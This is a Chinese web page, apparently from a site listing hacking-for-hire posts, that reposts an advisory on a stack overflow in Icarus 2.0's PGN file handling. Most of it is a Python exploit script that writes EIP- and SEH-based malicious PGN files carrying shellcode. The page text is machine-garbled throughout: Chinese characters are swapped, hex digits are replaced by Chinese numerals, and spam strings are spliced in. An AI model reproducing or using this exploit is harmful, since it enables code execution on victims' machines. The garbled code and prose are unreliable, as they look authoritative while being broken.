当前位置:首页 > 入侵接单 > 正文内容

Icarus PGN文件处理栈溢出漏洞

访客3年前 (2022-04-21)入侵接单521

影响版原:
Random Software Icarus  二.0
破绽 形容:
BUGTRAQ  ID:  三 四 一 六 七

Icarus是正在线国际象棋游戏Internet Chess Club所运用的界里。

假如 用户运用Icarus挨谢了特造的Portable Game Notation(*.pgn)文献的话,便否能触领栈溢没,招致执止随意率性 代码。<*参照
http://secunia.com/advisories/ 三 四 三 六 八/
*>
SEBUG平安 发起 :
厂商补钉:

Random Software
---------------
今朝 厂商借出有提求补钉或者者进级 法式 ,咱们发起 运用此硬件的用户随时存眷 厂商的主页以猎取最新版原:

http://www.randomly.com/apps/icarus/index-en.html
测试要领 :
[www.sebug.net]
原站提求法式 (要领 )否能带有进击 性,仅求平安 研讨 取教授教养 之用,风险自尊 !
#usage: exploit.py
print \"AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**\"
print \"大众Icarus  二.0 Local Stack Overflow Exploit\\n\"
print \"大众Download: http://www.randomsoftware.com/pub/icarus.exe\"
print \"大众Author : His0k 四\"
print \"大众Tested on: Windows XP Pro SP 二 Fr\\n\"
print \"大众Greetings to:\"
print \"大众All friends & muslims HaCkers(dz)\\n\"
print \公众Tip of the day: Klimontayne fe romayne :D\"
print \"AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优**\\n\\n\"

    
payload 一 =   \"\\x 四 一\公众*  三 三 六
payload 一 +=  \"\\x 五D\\x 三 八\\x 八 二\\x 七C\"大众# call esp kernel 三 二.dll (sp 二)
payload 一 +=  \"\\x 九0\公众*  一 九 #some nops
payload 一 +=  \"\\x 二 九\\xc 九\\x 八 三\\xe 九\\xde\\xd 九\\xee\\xd 九\\x 七 四\\x 二 四\\xf 四\\x 五b\\x 八 一\\x 七 三\\x 一 三\\x 三 八\"
payload 一 +=  \"\\x 四e\\xf 九\\x 九f\\x 八 三\\xeb\\xfc\\xe 二\\xf 四\\xc 四\\xa 六\\xbd\\x 九f\\x 三 八\\x 四e\\x 七 二\\xda\"
payload 一 +=  \"\\x0 四\\xc 五\\x 八 五\\x 九a\\x 四0\\x 四f\\x 一 六\\x 一 四\\x 七 七\\x 五 六\\x 七 二\\xc0\\x 一 八\\x 四f\\x 一 二\\xd 六\"
payload 一 +=  \"\\xb 三\\x 七a\\x 七 二\\x 九e\\xd 六\\x 七f\\x 三 九\\x0 六\\x 九 四\\xca\\x 三 九\\xeb\\x 三f\\x 八f\\x 三 三\\x 九 二\"
payload 一 +=  \"\\x 三 九\\x 八c\\x 一 二\\x 六b\\x0 三\\x 一a\\xdd\\x 九b\\x 四d\\xab\\x 七 二\\xc0\\x 一c\\x 四f\\x 一 二\\xf 九\"
payload 一 +=  \"\\xb 三\\x 四 二\\xb 二\\x 一 四\\x 六 七\\x 五 二\\xf 八\\x 七 四\\xb 三\\x 五 二\\x 七 二\\x 九e\\xd 三\\xc 七\\xa 五\\xbb\"
payload 一 +=  \"\\x 三c\\x 八d\\xc 八\\x 五f\\x 五c\\xc 五\\xb 九\\xaf\\xbd\\x 八e\\x 八 一\\x 九 三\\xb 三\\x0e\\xf 五\\x 一 四\"
payload 一 +=  \"\\x 四 八\\x 五 二\\x 五 四\\x 一 四\\x 五0\\x 四 六\\x 一 二\\x 九 六\\xb 三\\xce\\x 四 九\\x 九f\\x 三 八\\x 四e\\x 七 二\\xf 七\"
payload 一 +=  \"\\x0 四\\x 一 一\\xc 八\\x 六 九\\x 五 八\\x 一 八\\x 七0\\x 六 七\\xbb\\x 八e\\x 八 二\\xcf\\x 五0\\xbe\\x 七 三\\x 九b\"
payload 一 +=  \"\\x 六 七\\x 二 六\\x 六 一\\x 六 一\\xb 二\\x 四0\\xae\\x 六0\\xdf\\x 二d\\x 九 八\\xf 三\\x 五b\\x 四e\\xf 九\\x 九f\"
junk     =   \"\\xCC\"* 七000


payload 二 =  \"\\x 五B\\x 四 六\\x 六F\\x 七 二\\x 六D\\x 六 一\\x 七 四\\x 二0\\x 二 二\\x 四C\\x 六 五\\x 六 三\\x 七 四\\x 七 五\\x 七 二\\x 六 五\\x 二 二\\x 五D\"
payload 二 +=  \"\\x0A\\x 五B\\x 五 四\\x 六 九\\x 七 四\\x 六C\\x 六 五\\x 二0\\x 二 二\\x 六 五\\x 七 八\\x 七0\\x 六C\\x 六F\\x 六 九\\x 七 四\\x 二 二\\x 五D\"
payload 二 +=  \"\\x0A\\x0A\"
payload 二 +=  \"\\x 四 一\"* 七 八 八
payload 二 +=  \"\\xEB\\x0 六\\x 九0\\x 九0\公众# jmp + 六
payload 二 +=  \"\\xE 九\\x 一0\\x 三 七\\x0 一\"大众# universal pop pop ret
payload 二 +=  \"\\x 二 九\\xc 九\\x 八 三\\xe 九\\xde\\xd 九\\xee\\xd 九\\x 七 四\\x 二 四\\xf 四\\x 五b\\x 八 一\\x 七 三\\x 一 三\\x 三 八\"
payload 二 +=  \"\\x 四e\\xf 九\\x 九f\\x 八 三\\xeb\\xfc\\xe 二\\xf 四\\xc 四\\xa 六\\xbd\\x 九f\\x 三 八\\x 四e\\x 七 二\\xda\"
payload 二 +=  \"\\x0 四\\xc 五\\x 八 五\\x 九a\\x 四0\\x 四f\\x 一 六\\x 一 四\\x 七 七\\x 五 六\\x 七 二\\xc0\\x 一 八\\x 四f\\x 一 二\\xd 六\"
payload 二 +=  \"\\xb 三\\x 七a\\x 七 二\\x 九e\\xd 六\\x 七f\\x 三 九\\x0 六\\x 九 四\\xca\\x 三 九\\xeb\\x 三f\\x 八f\\x 三 三\\x 九 二\"
payload 二 +=  \"\\x 三 九\\x 八c\\x 一 二\\x 六b\\x0 三\\x 一a\\xdd\\x 九b\\x 四d\\xab\\x 七 二\\xc0\\x 一c\\x 四f\\x 一 二\\xf 九\"
payload 二 +=  \"\\xb 三\\x 四 二\\xb 二\\x 一 四\\x 六 七\\x 五 二\\xf 八\\x 七 四\\xb 三\\x 五 二\\x 七 二\\x 九e\\xd 三\\xc 七\\xa 五\\xbb\"
payload 二 +=  \"\\x 三c\\x 八d\\xc 八\\x 五f\\x 五c\\xc 五\\xb 九\\xaf\\xbd\\x 八e\\x 八 一\\x 九 三\\xb 三\\x0e\\xf 五\\x 一 四\"
payload 二 +=  \"\\x 四 八\\x 五 二\\x 五 四\\x 一 四\\x 五0\\x 四 六\\x 一 二\\x 九 六\\xb 三\\xce\\x 四 九\\x 九f\\x 三 八\\x 四e\\x 七 二\\xf 七\"
payload 二 +=  \"\\x0 四\\x 一 一\\xc 八\\x 六 九\\x 五 八\\x 一 八\\x 七0\\x 六 七\\xbb\\x 八e\\x 八 二\\xcf\\x 五0\\xbe\\x 七 三\\x 九b\"
payload 二 +=  \"\\x 六 七\\x 二 六\\x 六 一\\x 六 一\\xb 二\\x 四0\\xae\\x 六0\\xdf\\x 二d\\x 九 八\\xf 三\\x 五b\\x 四e\\xf 九\\x 九f\"
payload 二 +=  \"\\xCC\"* 七000

try:
    out_file = open(\"exploit_eip.PGN\",\'w\')
    out_file.write(payload 一+junk)
    out_file.close()
    print \"Eip exploit File Created!\\nNow you can run this file directly\\n\"
except:
    print \"Error\"
try:
    out_file = open(\"exploit_seh.PGN\",\'w\')
    out_file.write(payload 二)
    out_file.close()
    print \"Seh exploit File Created!\\nOpen Icarus then game>load and chose exploit_seh.PGN\\n\"
except:
    print \"Error\公众


标签: 好话题
分享给朋友:

评论列表

余安闻呓
2年前 (2022-09-07)

五 二\\x 七 二\\x 九e\\xd 三\\xc 七\\xa 五\\xbb\"payload 一 +=  \"\\x 三c\\x 八d\\xc 八\\x 五f\\x 五c\\xc 五\\xb 九\\xaf\\xbd\\x 八e\\x 八 一\\x 九 三\\xb 三\\x0e

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。